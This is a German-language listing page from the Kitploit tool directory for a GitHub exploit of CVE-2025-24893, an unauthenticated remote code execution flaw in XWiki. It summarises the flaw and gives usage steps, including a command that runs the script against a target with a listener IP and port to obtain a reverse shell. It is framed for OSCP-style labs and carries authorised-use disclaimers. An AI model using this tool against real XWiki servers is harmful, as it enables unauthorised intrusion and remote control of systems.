Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24893 — OSCP like CVE-2025-24893 exploit for Linux XWiki | Kitploit
Tools/GitHubGitHub/vasilysaint/cve-2025-24893
ExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access ToolLabs & Practice
GitHubvasilysaint/cve-2025-24893

CVE-2025-24893

OSCP like CVE-2025-24893 exploit for Linux XWiki

Repository anzeigen
1vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-24893

XWiki Platform ist eine generische Wiki-Plattform, die Laufzeitdienste für darauf aufbauende Anwendungen bereitstellt. Aufgrund einer Schwachstelle im SolrSearch-Endpunkt kann ein nicht authentifizierter Benutzer eine beliebige Remote-Codeausführung erreichen. Diese Schwachstelle beeinträchtigt die Vertraulichkeit, Integrität und Verfügbarkeit der gesamten XWiki-Installation.

CVE: CVE-2025-24893


Demo

Eine Demonstration des Exploits ist unten dargestellt:

Terminal Demo

Verwendung

Um diesen Exploit zu verwenden, befolgen Sie diese Schritte:

  1. Klonen Sie das Repository: git clone https://github.com/yourusername/CVE-2025-24893.git
  2. Navigieren Sie in das geklonte Verzeichnis: cd CVE-2025-24893
  3. Installieren Sie die erforderlichen Abhängigkeiten: pip install requests
  4. Führen Sie den Exploit aus:
root@kitploit:~
./CVE-2025-24893_linux-xwiki-exploit.py  -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]]

Über diesen Exploit

Dieser Exploit demonstriert die in CVE-2025-24893 beschriebene Remote-Codeausführungsschwachstelle und ermöglicht es einem nicht authentifizierten Benutzer, eine Reverse-Shell auf verwundbaren Linux-basierten XWiki-Installationen zu erhalten.

Ich habe dieses Tool ursprünglich für den Einsatz in Trainingsumgebungen wie OSCP-Vorbereitungslabs und Hack The Box entwickelt, wo ich eine einfache und zuverlässige Möglichkeit zur Reproduktion der Schwachstelle haben wollte. Da kein vorhandenes Tool meinen Anforderungen entsprach, entschied ich mich, ein eigenes zu erstellen.

Obwohl CVE-2025-24893 in unterstützten XWiki-Versionen bereits seit Langem gepatcht ist, sollte dieser Exploit nur gegen Systeme eingesetzt werden, die Ihnen gehören oder für die Sie ausdrücklich berechtigt sind, Tests durchzuführen.

Der Autor übernimmt keine Verantwortung für Missbrauch dieser Software oder für Schäden, die aus ihrer Nutzung entstehen.

Haftungsausschluss

Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Sicherheitsüberprüfungen bestimmt.

Verwenden Sie es nur gegen Systeme, die Ihnen gehören oder für die Sie ausdrücklich berechtigt sind, Tests durchzuführen. Der Autor übernimmt keine Haftung für Missbrauch dieser Software oder für Schäden, die aus ihrer Nutzung entstehen.

Mitwirken

Beiträge sind willkommen.

Wenn Sie auf Fehler stoßen, Verbesserungsvorschläge haben oder Unterstützung für zusätzliche Payloads, Plattformen oder Funktionen hinzufügen möchten, können Sie gerne ein Issue eröffnen oder einen Pull-Request einreichen.

Konstruktives Feedback, Testberichte und Codebeiträge sind sehr willkommen.

Tool herunterladen